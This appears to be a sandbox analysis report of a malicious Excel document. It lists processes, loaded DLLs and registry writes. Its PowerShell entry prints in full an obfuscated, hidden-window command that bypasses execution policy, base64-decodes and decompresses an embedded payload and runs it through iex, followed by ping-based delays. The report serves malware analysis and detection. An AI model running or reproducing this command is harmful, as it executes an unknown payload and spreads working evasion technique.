c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
3084
CMD
powERSHELl -noPro -windowstYL hIDDeN -nonInte -exeCuTIOnP bypASs $1K = [StrinG][ChAR]34 ;$KJ3= ([CHAR]44).ToSTRInG() ;"\"( .(${1K}{1}{2}{0}${1K}-f 'T'${KJ3}'nE'${KJ3}'W-objec') (${1K}{6}{5}{0}{3}{2}{8}{1}{7}{4}${1K}-f'I'${KJ3}'e'${KJ3}'cOMPRESSION.'${KJ3}'o.'${KJ3}'TEsTREam'${KJ3}'Ystem.'${KJ3}'S'${KJ3}'Fla'${KJ3}'d')([syStEm.Io.mEmorYstREam] [cONVeRt]::${1K}Fr`om`BasE6`4sT`RiNg${1K}((${1K}{9}{41}{37}{28}{2}{92}{89}{75}{40}{33}{58}{94}{1}{17}{52}{49}{93}{59}{54}{64}{63}{45}{36}{70}{66}{15}{13}{22}{12}{65}{39}{61}{10}{7}{81}{87}{29}{95}{96}{79}{23}{44}{18}{71}{42}{20}{24}{82}{25}{69}{38}{30}{5}{0}{88}{97}{77}{78}{67}{55}{27}{62}{84}{48}{76}{90}{80}{21}{74}{31}{16}{56}{43}{47}{35}{11}{73}{72}{83}{19}{98}{57}{50}{53}{85}{32}{51}{46}{91}{6}{34}{26}{60}{4}{86}{8}{14}{3}{68}${1K}-f 'A5WT4Ysfzc'${KJ3}'9qMq2pivVle3JZbbOIhBeFCyVDVxqqJvQkMViBROixQTBBEMga'${KJ3}'4xVg3fZ78OUR9V8'${KJ3}'X377s08+/PP7zeP348y/Tl0+P18'${KJ3}'Z5TiLVA39KotEnX8m9JX/F2JO4awWO6'${KJ3}'NIzLZMqznSDYjZsoP2Nr'${KJ3}'+'${KJ3}'BoYnCuEIfgVcnQyhezoy8RWTbgJDd3bnrDaUEYNHOsaiaNHYi0qJY3kdL7t'${KJ3}'rXS0t3GdynTydk1V2TJd2anb'${KJ3}'PZhbq+XGFYT/yn4wOefgxPS9g99ELshBxCYTUGAY9OAIWTDYMBz0kui/p77qPXnYsC+t7nWpqlW9H797vD6++TD/5fNy/vlj/PSt3u+flx/+/THmT9++/OvlTb+/Pl5KuGrYSzhjbGssdY6pr7U'${KJ3}'nYbNCqyWgyTkLKcbshQVKGkSlFJKKP4lctGY7pV09RGmcBk9xOEfPrw9DUerU7aWnugknEHM'${KJ3}'FwsjnxX'${KJ3}'pEzOlhHQRv8IIEqQXycLCL+KGMtDzM0CvFxaLRVOmoasW'${KJ3}'qPdOF2wglcTS4pcEh9GeqSh+zBvtS3UVfVDoWriXMOM72HFbIZl3RK6FK0JwDOU'${KJ3}'KA9f48t2Hnz7/8M/Xl2s7pn2+l/V8eXv89/H'${KJ3}'Q1p57l3CANSBlwdATNVj6VA92WbWnPwpgwm'${KJ3}'Kp0ZqXIeMBDbnGhUo+GeY/wRrNRMi9GOj2'${KJ3}'zPMO'${KJ3}'z2ZNUgZi56'${KJ3}'4wa8yHapYhvCWOAUvRgh3mat6TFlriK2i77VeEM3cBlVetPTe1E/cf5meCXnVUAP+PoUP1zbNxGWPygkzYxVCIak93mhJjLv9IH1fjZgd'${KJ3}'mRgS3boLFcAgA'${KJ3}'6tC4ecVgmY6A0LTMhqsFxLe+cxNJzkZLj'${KJ3}'ElBW+PKk6'${KJ3}'QacEfD2Va77NzwJrdQSTt850MI'${KJ3}'N'${KJ3}'fNc9WB05PN0egBR0oNgGVQ9y375QY9MY3RxH'${KJ3}'GHPa6o005sv3HbIduw19RcFUFymUs7q4yWX/e7P7Kt7HPwDVfzkcvqwFcNuZ0x70X/8+0KGn/4Y4LIeJGnI3sS1e5aiUX+UeySx'${KJ3}'ELK5eegfOLUxPoMZ4CF7DivQFwlszaf5CdlSu'${KJ3}'JZa'${KJ3}'E'${KJ3}'hM'${KJ3}'9fcKfZyWMAiDGqgzliJBU4Utz7NCg3OJF1Ufw4ELdmRG+TUg9xDBJGxNGOPNQt4e6PKMYB4'${KJ3}'ucTgbleyy+qZM1D4Gbq4GPJ'${KJ3}'TqA9/F2sEUHtLzrgM1bjMDvWOtZw6EAY86ce48s9ZZNKguIdNFDZ8xx9iat6Oykw+r+3GSKua7a4lRM2'${KJ3}'Wk++j8YGw9RqG4C'${KJ3}'r'${KJ3}'9o2md0KIRzApojwNan5k1FSRIXO5iATwOatE1c+uu'${KJ3}'sfY7ljTHmK4Yqt7nO6ZylrCVcMcYrxj7XdsdW15iK1NMadHC'${KJ3}'zU'${KJ3}'hO8fCypp97'${KJ3}'o+j4pkqjTa59jbWdtuw4+tJkCa'${KJ3}'u'${KJ3}'6DVEJdwQvWu/lA7z7U2WSg1HgxSYFeEZU+GxOlAkwR3ArXMBCRR3BT39GIK3IOj2JQMfHn+IhLkoa'${KJ3}'ZmBDqwogWBwqX7Trm69Y7X2Vi7kQHqG+R9whi+7ERtcfniXRDofNm5EXllhCKJ1XHcxnASGpAEWwqVnzycCyK7W'${KJ3}'epq'${KJ3}'dV1InkQm/GC8RoKiJBakmip'${KJ3}'EpSW88JdEPGSRCkhF'${KJ3}'6OLWcEYnXRlY+fICfl63iOEE'${KJ3}'UOJA/'${KJ3}'BNUs6E'${KJ3}'gvkeKjAjT7V0BnEjFnYNRPWaSHZ3sFPSmHzd'${KJ3}'R7KHOIMgHK98jAjgu2F21Nh'${KJ3}'mo3vMKa1PpquKlVKFtPa7umKrYBJES56ZC'${KJ3}'dxgcTT0W+6u7PyNpXH8rIECfxGK'${KJ3}'UbgE3sKnms+KBE2UHGVqiiaRC0BUMxS5Uu5hqWArnE0tKWC5rW4+'${KJ3}'6YN6k5vKEdYMcDJJ4qQTep'${KJ3}'Wuga0w7/ocmcb+YfXe'${KJ3}'bWQXMTQCk3'${KJ3}'iruz3UjmFpdOBL'${KJ3}'GrjGI4LS4/jia6XMNhUs8ie9WqkoUK3dhFSIxM93zLZbKry2oTTHK8W96YSk1Ysc1OLazzdljC6l3mU6iUV'${KJ3}'5wi14au7OM9ThDEJ'${KJ3}'vLuwSMaRnxoTYh7xqCv6Tp0VGoTip4xSRJ1bEQqEKgNPa'${KJ3}'JuO'${KJ3}'YVxEaeiGCjg5xLbKEAl1+N39yt3UkVBQWtg3AZVNjWD0'${KJ3}'dctxil0Fou3EW7NO09aFlAUp90dZFTCtOia6CZYhjlABJBVVyNR2b5FGwQzzi6SoelO5UyMlUl'${KJ3}'wWC2jl41gk3ZNlIpGq7'${KJ3}'ZNQv'${KJ3}'qcMtMKxRaavRz46M9ucYC/wNRK31J4BdEW92Y143i2yeJ6snixM4r4x5pDLjJUKw/IFcRtlqwzt/BQU6IeJ1W'${KJ3}'fHP/3492v/8v7p++/ffzx/fY/t9fH6zfbd+28f3v9x/nq8vr09fv/Hx9vj7e1+e/zhb1rzeNFu/wM='${KJ3}'hEK9CRPvTFuaTJTYKISTuoFaq6Kt'${KJ3}'pbjK3Ntapgzb1SbaGX9tHXoDOqwmFwwBk'${KJ3}'ZQOJ2O8wYriHy8BSApmcLGJFViIs35XeieqwPQbU0YxNC5'${KJ3}'N1PJNB'${KJ3}'WK2hlm+2VUWpQ0bqfGFiWj'${KJ3}'l4s4yccl5hNyh4sqvNk2CRNQ4ayDx'${KJ3}'GlHolZ'${KJ3}'f9/MWBCS0FV74AMMhKhplCBvFNnKFAwcysnDw'${KJ3}'81Q9vAWuWUnmFWCMhOoevgulipLpHKtC+qdykAS'${KJ3}'1rI+xZScS0eFFBi2rl4GrMcR0SkBLKpmm'${KJ3}'UJ'${KJ3}'Y1Z2PMoFHhMVxAU'${KJ3}'i9VYlK9qdjFpFoglBbVS9LPRaQ2+Tso8'${KJ3}'IFrV0yBGVzWUOg3XFhVQwe'${KJ3}'AnSeR4TwXcKNYaco6+dNpC+qKaBbQEa2wloPa'${KJ3}'yrS4TeOX09MgUJx00b0c6IHgQ6cirJxMoX7YZRFyG5YzDF9KW0pb'${KJ3}'DMkLX1l'${KJ3}'A88ga+9B/TQo1Q+mwvXyU7vnu'${KJ3}'KqbDgrxCy8w'${KJ3}'E1hhzA6HYjp4VSV66hqtUTSLRgqm3bw9DR38jMd9'${KJ3}'owEkHatt0j32yfiparFjiodOWSoR51cpVJ+jEc'${KJ3}'NlMIXB8tLsdg'${KJ3}'ijIW7fRdjl7boNbt65yTkQNhwVL0HCAQyY7pev4bcY6ruDIXToexZ/lu32HQM9p8DxlJeXJ6'${KJ3}'6xd1p82l6DFjX9wMI+1Xr'${KJ3}'jXrm8tHS3r0DC1vlJLNYrjQ'${KJ3}'U7pE4U2P7MzYVoBU9Uqeetq4SlkaSJHXqQR2gg0LUyswTR2sT61O+vD1NqDSgnTF05bIUglXhUpvdEtWfsrbGIrU2juRTWFqYdL4+'${KJ3}'5cQAJhaLJw3vArTnX'${KJ3}'T0t0NGSoQ0RiwpfHQSVSWbLahQF9BSp2YzgjCp1wgYiO9WqHnXCAdMxzBV5d3o68jCPwHtBiZ'${KJ3}'mu2a6lB+/XbQGGiOmamMsbRZBLE+BQRrC0eI4sbNE5BEywjJjqL0veEU6/0UwsW9NwMxL0/RRN4G0SHGLJm3Oa24n'${KJ3}'IO3wLU'))${KJ3} [syStEm.Io.CoMPressioN.COMprEssionmode]::${1K}dECOm`p`RESs${1K} )|&(${1K}{1}{0}{2}${1K}-f 'E'${KJ3}'foR'${KJ3}'aCh') { .(${1K}{2}{0}{1}${1K} -f '-o'${KJ3}'bjecT'${KJ3}'nEW') (${1K}{3}{2}{4}{0}{1}${1K}-f 'm'${KJ3}'reaDER'${KJ3}'o.str'${KJ3}'SYSTem.i'${KJ3}'Ea')( `${_} ${KJ3} [sysTEM.tExT.enCODiNg]::${1K}a`scII${1K})} ).${1K}rEAd`ToEnD${1K}( ) |&( `${VER`BOsE`pre`Fe`REnce}.${1K}tOS`TrIng${1K}()[1${KJ3}3]+'x'-JoiN'')"\" | &( $pshOme[21]+$pSHome[30]+'x')
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powERSHELl.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\ping.exe
c:\windows\system32\netutils.dll

PID
3508
CMD
"C:\Windows\system32\PING.EXE" 4.4.4.4 -n 0
Path
C:\Windows\system32\PING.EXE
Indicators
No indicators
Parent process
powERSHELl.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
TCP/IP Ping Command
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\ping.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll

PID
3216
CMD
"C:\Windows\system32\cmd.exe"
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
3221225786
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
2760
CMD
"C:\Windows\system32\PING.EXE" 4.4.4.4 -n 0
Path
C:\Windows\system32\PING.EXE
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
TCP/IP Ping Command
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\ping.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2452
CMD
"C:\Windows\system32\PING.EXE" 4.4.4.4 -n 1
Path
C:\Windows\system32\PING.EXE
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
TCP/IP Ping Command
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\ping.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll

PID
1780
CMD
"C:\Windows\system32\PING.EXE" 4.4.4.4 -n 0
Path
C:\Windows\system32\PING.EXE
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
TCP/IP Ping Command
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\ping.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2664
CMD
"C:\Windows\system32\PING.EXE" 4.4.4.4 -n 2
Path
C:\Windows\system32\PING.EXE
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
TCP/IP Ping Command
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\ping.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll

Registry activity

Total events
1853
Read events
1313
Write events
521
Delete events
19

Modification events

PID
Process
Operation
Key
Name
Value
2088
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
2088
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
2088
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\1214AA
2088
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
2088
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\121602
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
459
3435390028080000010000000000000000000000
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
28080000AED99F58020BD50100000000
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\1214AA
1214AA
04000000280800005000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0032003000310039005F0045006D00610069006C0043006C00690065006E00740065005F0030003000300030003000360035003400340035005F0041006C006C0065006700610074006F0031005F00320030003100390030003500310035003000360031003900340031002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00010000000000000010A7005A020BD501AA141200AA14120000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\1214AA
1214AA
04000000280800005000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0032003000310039005F0045006D00610069006C0043006C00690065006E00740065005F0030003000300030003000360035003400340035005F0041006C006C0065006700610074006F0031005F00320030003100390030003500310035003000360031003900340031002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00010000000000000010A7005A020BD501AA141200AA14120000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2088
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1320091671
2088
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1320091792
2088
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1320091652
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{6D8EC1FF-0A28-45F8-BEE0-31AE76FAB7A6}
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\1214AA
1214AA
04000000280800005000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0032003000310039005F0045006D00610069006C0043006C00690065006E00740065005F0030003000300030003000360035003400340035005F0041006C006C0065006700610074006F0031005F00320030003100390030003500310035003000360031003900340031002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00010000000000000010A7005A020BD501AA141200AA14120000000000AC020000001800000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\121602
121602
04000000280800005000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0032003000310039005F0045006D00610069006C0043006C00690065006E00740065005F0030003000300030003000360035003400340035005F0041006C006C0065006700610074006F0031005F00320030003100390030003500310035003000360031003900340031002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000001000000A0B29858020BD501021612000216120000000000AC0200006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000